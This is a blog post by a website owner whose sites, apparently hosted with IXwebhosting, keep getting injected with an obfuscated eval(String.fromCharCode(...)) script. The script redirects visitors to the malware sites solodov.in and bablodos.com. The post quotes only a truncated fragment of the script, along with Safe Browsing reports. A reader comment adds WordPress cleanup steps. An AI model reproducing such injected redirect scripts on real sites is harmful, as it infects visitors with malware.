I have a lot of websites hosted with IXwebhosting. There is malicious code / script that looks like this
<script>eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,71,97,112,111,107,97,104,106,75,105,98,117,98,97,103,117,32
and continues for a while.
This causes visitors to my websites to be redirected to solodov.in or bablodos.com and then trojans and viruses are put on their computers from these websites. So what is happening?
I am getting blacklisted from search engines and appear my traffic is dropping fast
What have I done?
I contacted IXwebhosting IMMEDIATELY after it first happened, they removed the script and told me to change my ftp passwords and deep clean my computere, I did that and I was happy, then a few hours later the code appears again. Shit, contant IXwebhosting and ask them to remove the code again, so they do and then they tell me to do the same thing again. I said I already have, then they say to add ftp.allow and ftp.deny, so I do. Code is gone, code comes back again. I analyze the log and it shows access from 127.0.0.1 which is the local machine, or the ixwebhosting server. Now I start to think maybe this is not my problem, maybe it is a problem with ix webhosting. I do a google search for solodov.in and bablodos.com
and this comes up http://www.google.com/safebrowsing/diagnostic?site=solodov.in/&hl=en
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, solodov.in appeared to function as an intermediary for the infection of 37 site(s) including yoursoil.com/, pokerdepositoptions.com/, passrider.com/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 228 domain(s), including yoursoil.com/, doggienews.com/, fidelityaccount.org/.
Most of these websites are hosted by IXwebhosting
I also check bablodos.com and get this
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, bablodos.com appeared to function as an intermediary for the infection of 143 site(s) including catruong.com/, virtualupdate.org/, useless-knowledge.com/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 380 domain(s), including eritreadaily.net/, symbian-skin.com/, r4ds-r4i.com/.
Most of those sites hosted by IXWEBHOSTING!! Now I’m mad, I email them and open a chat and a ticket and to top it off all the code is still on all of my websites and every page. Ixwebhosting keeps telling me to change my FTP passwords and clean my computer, all of which I have done.
So what I did was ask them to change my FTP password and they did, now the ONLY one who knows that password is Ixwebhosting, then remove the code. Guess what, code is gone, code comes back. The only way my account could have been hacked by “stealing” my ftp is if they got it from Ixwebhosting.
The only other thing I can think of is it could have something to do with my wordpress blogs??
I have disabled all of my wordpress blogs and asked them to remove the code again.
I am trying to figure this out.
Was your site affected? Are you with IXwebhosting? Do you have a wordpress blog?
Filed under: Uncategorized | Tagged: bablodos.com, hack, hackers, ixwebhosting, malicious code, solodov.in, trojan, virus, wordpress, wordpress virus |
Huntsville Ontario 
I have the exact same issue right now with ixwebhosting. How did you resolve your problem ?
MANY emails to ixwebhosting. to protect the visitors to my site I turned my web service off so all my sites were offline. I then put up all my static sites that were not wordpress. Then I slowly put up my wordpress sites and secured each one, I re-uploaded all the core files, then installed wp-secure plugin and changed all my passwords and followed suggestions from wp-secure, no problem since